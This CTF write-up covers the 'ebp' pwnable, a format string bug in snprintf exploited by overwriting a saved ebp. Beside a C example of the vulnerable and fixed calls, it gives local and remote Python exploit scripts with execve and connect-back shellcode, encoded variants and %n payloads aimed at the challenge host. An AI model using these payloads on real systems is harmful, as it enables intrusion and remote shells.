PWNABLE – ebp 160pt
1. Problem
Using fgets, the program reads up to 1024 bytes of input into buf, a variable in the .bss section.
Next comes the echo function, which runs after that.
It calls make_response and then prints response, another .bss variable, with puts.
make_response copies the contents of buf into response with snprintf, limited to 1024 bytes.
2. Vulnerability
Looking at the overall flow of the program: it reads input into buf, copies that value into response, and prints it.
It is a program that echoes the user's input back.
Since response and buf are both 1024 bytes, there is no buffer overflow.
Just in case, I tried entering %x, and values from the stack were printed.
The format string bug familiar from printf shows up in snprintf as well.
Let's attack by manipulating the values sitting on the stack.
I checked the values on the stack.
The fourth position holds echo's ebp.
If ebp can be manipulated, eip can be controlled.
I wrote the shellcode and the shellcode's address into buf, then used the format string bug to change main's ebp to the address 4 bytes before the spot where the shellcode's address is stored.
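The root cause above is that make_response hands user input to snprintf as the format argument. The following C example is added here to show that pattern beside its fix; it is a reconstruction for illustration, not the challenge binary or the author's code. The helper names (format_into, make_response_vulnerable, make_response_fixed, looks_like_format_string) are assumptions. The sample input "100%% done" is constructed so that both paths stay well-defined: "%%" is the one conversion that reads nothing from the stack, yet it is enough to show that the vulnerable path interprets the input while the fixed path copies it verbatim. The wrapper deliberately lacks __attribute__((format(printf, 3, 4))); add that attribute and gcc/clang's -Wformat-security will flag the vulnerable call, which is the check a code reviewer wants in place.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define RESPONSE_SIZE 1024

/* Wrapper standing in for the challenge's make_response (assumed name).
 * It carries no __attribute__((format(printf, 3, 4))), so -Wformat-security
 * cannot see that a non-literal format reaches vsnprintf through it. */
static int format_into(char *dst, size_t n, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int written = vsnprintf(dst, n, fmt, ap);
    va_end(ap);
    return written;
}

/* Vulnerable pattern (reconstructed from the write-up, not the original
 * binary): user input is used as the format string, so every conversion
 * in it is interpreted against whatever happens to be on the stack. */
int make_response_vulnerable(char *response, const char *buf)
{
    return format_into(response, RESPONSE_SIZE, buf);
}

/* Hardened form: the format is a literal and buf is only a %s argument,
 * so "%x" or "%n" inside buf are copied as ordinary characters. */
int make_response_fixed(char *response, const char *buf)
{
    return format_into(response, RESPONSE_SIZE, "%s", buf);
}

/* Boundary check for input that is about to reach a formatting routine:
 * returns 1 if s contains a '%' that starts a conversion (anything other
 * than the literal "%%"), which is what the "%x" probe in the write-up
 * looks like on the way in. */
int looks_like_format_string(const char *s)
{
    for (const char *p = s; (p = strchr(p, '%')) != NULL; p++) {
        if (p[1] == '%') {
            p++;            /* "%%" is a literal percent sign, skip it */
            continue;
        }
        return 1;
    }
    return 0;
}

int main(void)
{
    char response[RESPONSE_SIZE];
    const char *input = "100%% done";   /* constructed sample input */

    make_response_vulnerable(response, input);
    printf("vulnerable: %s\n", response);   /* "100% done": %% was interpreted */
    make_response_fixed(response, input);
    printf("fixed:      %s\n", response);   /* "100%% done": copied verbatim */
    printf("flagged:    %d\n", looks_like_format_string("%x"));
    return 0;
}
```

The difference in the two printed lines is the whole bug: once "%%" is being interpreted, so would "%x" and "%4$n" be, and those read and write through stack values instead of consuming nothing.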
3. Exploit
local
# Python 2 exploit script. The author kept earlier attempts in place; each
# later assignment of shell / payload replaces the previous one, and only
# the final payload is printed.
'''
shell = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66" #13
shell += "\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xa8" #26
shell += "\xbc\x81\x9f\x68\x02\x00\x04\xd2\x89\xe1\xb0\x66\x50" #39
shell += "\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73" #52
shell += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0" #65
shell += "\x0b\xcd\x80" #68
'''
shell = 'a' + '\xae\xa0\x04\x08'*6 + '\x90'*6 + '\x31\xc0\xb0\x31\xcd\x80\x89\xc1\x89\xc3\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'

# first attempt
payload = "\x84\xa0\x04\x08" #shell code
payload += "aaaaaaaaaaaa"
payload += shell # 4 + 68 = 72 bytes
payload += "bbbbbbbbbbbbb"
payload += "%.134520884u%4$n"
payload += "cccccccccccc"
#print payload

# second attempt
shell = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
payload = "\x84\xa0\x04\x08"
payload += shell
payload += "%.134520927u%4$n"
#print payload

# encoded shellcode variants; the last assignment is the one used
shell = "\xb8\xa7\xd5\x0f\x43\xda\xda\xd9\x74\x24\xf4\x5a\x2b\xc9" +\
        "\xb1\x12\x83\xea\xfc\x31\x42\x0e\x03\xe5\xdb\xed\xb6\xd8" +\
        "\x38\x06\xdb\x49\xfc\xba\x76\x6f\x8b\xdc\x37\x09\x46\x9e" +\
        "\xab\x8c\xe8\xa0\x06\xae\x40\xa6\x61\xc6\xfa\xe4\x13\x89" +\
        "\x93\x16\x14\xa4\x3f\x9e\xf5\x76\xd9\xf0\xa4\x25\x95\xf2" +\
        "\xcf\x28\x14\x74\x9d\xc2\x88\x5a\x51\x7a\xbf\x8b\xf7\x13" +\
        "\x51\x5d\x14\xb1\xfe\xd4\x3a\x85\x0a\x2a\x3c"

shell = "\xb8\x6e\x8b\xa7\xaa\xdb\xc3\xd9\x74\x24\xf4\x5f\x2b\xc9" +\
        "\xb1\x12\x31\x47\x12\x03\x47\x12\x83\x81\x77\x45\x5f\x6c" +\
        "\x53\x7d\x43\xdd\x20\xd1\xee\xe3\x2f\x34\x5e\x85\xe2\x37" +\
        "\x0c\x10\x4d\x08\xfe\x22\xe4\x0e\xf9\x4a\x5f\x4c\x78\x15" +\
        "\xf7\xaf\x7b\x38\x54\x39\x9a\x8a\x02\x69\x0c\xb9\x79\x8a" +\
        "\x27\xdc\xb3\x0d\x65\x76\x63\x21\xf9\xee\x13\x12\x9f\x87" +\
        "\x8d\xe5\xbc\x05\x01\x7f\xa3\x19\xae\xb2\xa4"

shell = "\xbb\xbc\xb8\x22\x54\xdd\xc3\xd9\x74\x24\xf4\x5e\x2b\xc9" +\
        "\xb1\x12\x31\x5e\x12\x83\xee\xfc\x03\xe2\xb6\xc0\xa1\x2b" +\
        "\x1c\xf3\xa9\x18\xe1\xaf\x47\x9c\x6c\xae\x28\xc6\xa3\xb1" +\
        "\xda\x5f\x8c\x8d\x11\xdf\xa5\x88\x50\xb7\x9d\xd7\x22\xd8" +\
        "\xb6\x25\x25\xe7\xfa\xa3\xc4\x57\x64\xe4\x57\xc4\xda\x07" +\
        "\xd1\x0b\xd1\x88\xb3\xa3\xc5\xa7\x40\x5b\x72\x97\xc4\xf2" +\
        "\xec\x6e\xeb\x56\xa2\xf9\x0d\xe6\x4f\x37\x4d"

# final payload: target address, nop sled, shellcode, then the %n write
payload = "\xb4\xa0\x04\x08"
payload += "\x90"*100
payload += shell
payload += "%.134520758u%4$n"
print payload
remote
# Python 2 remote version of the same exploit.
from socket import *
from struct import *
import sys
import os
import time

# pack/unpack come from "from struct import *"; the original wrote
# struct.pack without importing the struct module itself
p = lambda x : pack("<L", x)
up = lambda x : unpack("<L", x)

host = "52.6.64.173"
port = 4545

shell = ""
shell += "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66" #13
shell += "\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xa8" #26
shell += "\xbc\x81\x9f\x68\x02\x00\x04\xd2\x89\xe1\xb0\x66\x50" #39
shell += "\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73" #52
shell += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0" #65
shell += "\x0b\xcd\x80" #68

# encoded shellcode variants; the last assignment is the one used
shell = "\xb8\x6e\x8b\xa7\xaa\xdb\xc3\xd9\x74\x24\xf4\x5f\x2b\xc9" +\
        "\xb1\x12\x31\x47\x12\x03\x47\x12\x83\x81\x77\x45\x5f\x6c" +\
        "\x53\x7d\x43\xdd\x20\xd1\xee\xe3\x2f\x34\x5e\x85\xe2\x37" +\
        "\x0c\x10\x4d\x08\xfe\x22\xe4\x0e\xf9\x4a\x5f\x4c\x78\x15" +\
        "\xf7\xaf\x7b\x38\x54\x39\x9a\x8a\x02\x69\x0c\xb9\x79\x8a" +\
        "\x27\xdc\xb3\x0d\x65\x76\x63\x21\xf9\xee\x13\x12\x9f\x87" +\
        "\x8d\xe5\xbc\x05\x01\x7f\xa3\x19\xae\xb2\xa4"

shell = "\xbb\xbc\xb8\x22\x54\xdd\xc3\xd9\x74\x24\xf4\x5e\x2b\xc9" +\
        "\xb1\x12\x31\x5e\x12\x83\xee\xfc\x03\xe2\xb6\xc0\xa1\x2b" +\
        "\x1c\xf3\xa9\x18\xe1\xaf\x47\x9c\x6c\xae\x28\xc6\xa3\xb1" +\
        "\xda\x5f\x8c\x8d\x11\xdf\xa5\x88\x50\xb7\x9d\xd7\x22\xd8" +\
        "\xb6\x25\x25\xe7\xfa\xa3\xc4\x57\x64\xe4\x57\xc4\xda\x07" +\
        "\xd1\x0b\xd1\x88\xb3\xa3\xc5\xa7\x40\x5b\x72\x97\xc4\xf2" +\
        "\xec\x6e\xeb\x56\xa2\xf9\x0d\xe6\x4f\x37\x4d"

payload = "\xb4\xa0\x04\x08"
payload += "\x90"*100
payload += shell
payload += "%.134520758u%4$n"

s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
#payload = "\x84\xa0\x04\x08" #shell code
#payload += shell # 4 + 68 = 72 bytes
#payload += "%.134520884u%4$n"
#print payload
#print "len shell"
#print len(payload)
#print "send payload"
s.send(payload)